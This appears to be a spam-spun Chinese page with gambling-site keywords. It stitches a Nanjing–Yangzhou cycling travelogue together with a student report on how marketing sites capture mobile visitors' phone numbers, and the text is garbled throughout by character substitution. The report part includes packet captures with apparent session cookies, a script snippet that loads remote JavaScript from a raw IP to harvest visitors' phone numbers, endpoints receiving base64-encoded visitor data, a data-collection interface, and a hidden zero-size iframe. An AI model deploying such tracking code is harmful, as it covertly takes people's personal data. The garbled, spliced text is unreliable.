5588葡京线路南京-扬州 往返骑行

眼前一段时间“跨界”参加了母校的音安全竞赛,没悟出居然还将了三等奖,把研究课题报告分享下,还是生局部值得学习之地方。(实在太忙碌,一些图片就无移过来了)

业已盼望会顶扬州逛,感受这栋古城的派头,却直接从未确切的时机。南京交扬州一百几近公里,其实并无远,有成百上千对象自驾到扬州,也来文艺范的朋友同转乘公交及扬州,而自己又爱好骑行。

场景:目前,信息安全遭到关注。但最近许多营销网站(其中因治疗营销网站为主)可精准落移动端访客信息(如手机号码、QQ号码当)从而进行营销。此现象表明以采用移动设备看网站(包括未限于WAP网页)时在信息外泄的安全隐患,对是我们进行研讨,探究网站抓取移动端访客信息之原理。以下将阐述探究过程。

清明节放假第二天,大约早八点,和自身一哥等齐声由南京雨花台出发,骑行前往扬州。清明时令多雨水,南京吧非异。一大早雨水就淅淅沥沥起来,幸运的凡骑行不一会儿,雨水就得了了四起,要无我们实在如穿正雨衣骑行了。一路过南京城区,经过长江大桥,然后上了G205,这几段子骑行耗费了约有数单小时,而我们居然还并未到六合,比咱预料而多发生同小时。

首先,我们经过搜索引擎搜索可提供抓取网站访客信息的连锁服务提供商。在百度
中检索关键字“获取访客手机”等要字可是查询及大半只服务提供商,均采用百度竞价排名服务。如图:

算是开始了穿六合的路,一路差不多还当G328上骑行。强烈的东南风让咱们盖发生六十公里的骑行都遭受逆风之苦,平均时速每小时12公里。朋友起抱怨:我们真正是生身患,骑在同一龙三十片钱租来之笨重山地车,在当下震动的路面及在风猛骑,速度为绝非抢多少,真的是累成狗了。我只得说:病之莫易于。下午两点大多到扬州地级市仪征,原计划中午十二点就算可知达扬州城厢然后美美饱餐一顿的,现在也喝在东南风…下午四点半左右算是抵达扬州文昌阁,找好住的地方,一头扎上枕头里。没办法,一龙往返南京扬州底计划泡汤,只能改变吧少上。

有些产品介绍如图:

扬州虽无是江南,但也不乏小桥流水;扬州几乎从未高楼,路边卖菜之大婶怡然自得;瘦西湖文昌阁东关街,透着即栋都之古雅风韵。清明之间是扬州底游览旺季,酒店公寓客栈纷纷涨价,小伙伴等而专注啊。朋友带本人错过东关街用,整条街的小吃,眼花缭乱。我们算饿坏了,把各种小吃吃了只百分之百。最感谢兴趣的还是扬州蟹黄汤包、扬州炒饭。不过据称东关街之拼盘多都是假货,请各位小伙伴擦亮眼睛。我们当冶春东关街支店吃的蟹黄包、扬州炒饭也未是正宗的,不禁唏嘘不已。

 

回来酒店,同行之兄弟腿疼发作、又拉肚子,不尽让咱们本着明朝的骑行回到有些担忧。考虑第一龙骑行的免如愿,我们反了回到南京底骑行路,改道乘轮渡过江,到达镇江,再至南京。次日七沾半出发,八点半横达瓜州汽渡,九接触左右抵镇江,然后路经过句容走仙林大道上南京,一路路况好,春风盎然。下午一点二十左右到南京珠江路,结束了南京-扬州的来回骑行。

连锁介绍类似,不发了多截图。访客信息得到服务从百状元至千元/月不对等。

骑友们如果为闹骑行南京至扬州之计划,建议使用第二栽途径。

我们透过尝试不同的软件工具对访客关键信息进行抓取分析,以探索信息泄露所处的通信环节。

率先,使用fiddler对数码报文进行抓取。

(1)对PC端进行抓包

Headers内容如下:

GET http://www.baidu.com/?tn=98050039_dg&ch=1&ref=360 HTTP/1.1

Host: www.baidu.com

Connection: keep-alive

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 UBrowser/5.7.16400.12 Safari/537.36

Referer: http://www.baidu.com/?tn=98050039_dg&ch=1

Accept-Encoding: gzip, deflate

Accept-Language : zh-CN,zh;q=0.8

Cookie: BIDUPSID=016BE1E811953B967E8FD7844E50E63E; PSTM=1478172121; BAIDUID=AC446DF7C75C578ADEF5B2073A4B7022:FG=1; BDUSS=DFvSm92eHVwM01hVXRjRGhwemk5fnFNZWZabGd2YTFsQnd1WDhHcFlVbGJ5VUpZSVFBQUFBJCQAAAAAAAAAAAEAAACMgx4CYTE5OTYxMTA5ZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFs8G1hbPBtYa; andr=7

可逮到手到地方、客户端操作系统、浏览器版本等体系信息。

(2)将装有fiddler的PC与Android手机连接到同无路由器,并将手机代理调为PC端ip地址,通过PC端口联网,用PC端fiddler对手机进行抓包。

Headers内容如下:

GET http://m5.baidu.com/favicon.ico HTTP/1.1Host: m5.baidu.comProxy-Connection: keep-aliveAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,en-US;q=0.8Cookie: BAIDUID=B627F0F8D61A16BC166E54842394746F:FG=1; BAIDU_WISE_UID=wapp_1480052601504_789; plus_cv=1::m:d48b9a53; plus_lsv=3cda332116465cc3; H_WISE_SIDS=106472_100807_100272_102479_108373_109785_109549_106262_110629_110643_110710_107800_111123_110606_112108_110718_111967_110693_110498_110011_111549_112106_111928_109588_110655_107317_110031_111216_110085_111245; BDSVRTM=166User-Agent: Mozilla/5.0 (Linux; U; Android 6.0.1; zh-CN; M I 5 Build/MXB48T) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.2.5.884 Mobile Safari/537.36

不得不抓取到手机的版本信息,无法抓捕到手到手机号等关键信息。

(3)对阿里云Windows Sever
2008服务器进行抓包,用手机连接服务器80端口(访问网站)

没辙抓捕取手机号等消息。

fiddler抓取访客手机号等要信息失败,说明手机号码等根本信息之泄露并无是当应用层泄漏。推测在网络层发生。

对网络层发生信息泄露推测途径可能发以下简单栽:

一个凡运营商强行在http请求头里加入手机号,key名为x-up-calling-line-id,也发生或是x-up-subno、network-info等,value这里归的尽管是手机号码。

再有雷同栽是营业商私自给广告平台开后端接口,这种景象下就是请求里不带手机号,也可博到公的手机号,这种是当前比广泛的路子。

咱还在网上找到可以一直沾访客手机号码的网页:

http://112.124.4.229:808/member/my.php?mid=21&status=4

由此手机加载一段子他们提供的js代码后,即可取得到访问者的运动手机号码,获取率很高。

透过抓包分析可以发现:

先是,抓包要因此谷歌浏览器伪装成手机访问,不然抓包不交,因为网站屏蔽了pc端。

当用户访问手机网站后,会加载一截js,js请求访问IP:

http://218.206.176.104:8080/api/cc.jsp?cmsn=Mm1JeVFaZW9YUjZxVEhoVVc2WGZTUT09&q=http%3A%2F%2F121.40.123.23%2Frecv.php%3F\_f%3D185659aff8c4e814a5d3537d9efb98bf\_-\_id%3Dwxkj\_-\_inx%3D0\_-\_ref%3Dhttp%25253A%25252F%25252Flocalhost.com%25252F1.php\_-\_query%3D%252526id%25253Dwxkj%252526c%25253D3\_-corp%3D

博到手机号之后,会拿手机号通过base64加密返回给
js请求的参数q的价,如上面的:

http://121.40.123.23/recv.php?\_f=185659aff8c4e814a5d3537d9efb98bf\_-\_id=wxkj\_-\_inx=0\_-\_ref=http%3A%2F%2Flocalhost.com%2F1.php\_-\_query=%26id%3Dwxkj%26c%3D3\_-corp=bnVsbCxNb3ppbGxhLzUuMCAoaVBob25lOyBDUFUgaVBob25lIE9TIDdfMCBsaWtlIE1hYyBPUyBY%20OyBlbi11cykgQXBwbGVXZWJLaXQvNTM3LjUxLjEgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9u%20LzcuMCBNb2JpbGUvMTFBNDY1IFNhZmFyaS85NTM3LjUz

参数corp 的价值就是手机信息base64各项加密后的,解密后可窥见内容为:

null,Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X; en-us) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53

如若是手机看网站的讲话, null
就会是你的手机号,因为实验是经计算机访问的,所以无手机号

(1)页面脚本

通过这个ip地址授权域名获取访问网站的无绳电话机号113.106.95.36:8081

页面添加代码:

1 <script type="text/javascript">
2 var bhid = 1;
3 var str;
4 str = '<scr' + 'ipt type="text/javascript" src="http://113.106.95.36:8081/mm.js';
5 str = str + '"></scr' + 'ipt>';
6 document.write(str);
7 </script>

bhid是客户自己设置的参数值,建议数字和英文组成,后台接口可以收获之参数值,主要为用户自己别脚本投放网站的色。

(2)客户自己出一个URL地址接口,以便我方调用客户的接口发送数据,GET方式发送,GET的参数值以下:

string Mobile //手机号码
string bhid //客户自己设置的参数值
string locationurl //当前访问的URL地址
string title //当前页面标题
string lasturl //上页面URL
string ua //机型
string ip //IP地址

如上参数获取后5588葡京线路还待URL解码

综合,WAP的拜会方式是减访问方式,这里方式是手机先来一个做客的伸手,由运营商的WAP服务器中转站接受到你的要后,由WAP服务器排除制定要去顾你的网站,然后在获取数据,经由WAP中转服务区开展数据压缩后回传到您的无绳电话机及。

举凡利用WAP上网,其实是优先走访的WAP中转服务器,而不是一直看的网站,在这历程遭到,WAP中转服务器会要求对您的无绳电话机要进行拍卖以及分析,这其间纵使隐含了公的手机号码和时间轴。所以,在这过程中大部分访客的手机号码就得抓取出来了。

首先不管是转账服务器还是线,都是由于网运营商控制的,也就是说普通公司基本没有或获得的及。各大手机运营商都发生自己之外包企业,帮忙处理多少,而这些多少及通道是得于外包企业拓展打的。

因为下列代码为例:

<iframe src=“http://112.122.35.6.xxx/?id=test&c=2” width="0" height="0" scrolling="no" frameborder="0"></iframe> 

(实例代码,已经不行)

http开头就是数额端口,抓取信息吗是打这里出的。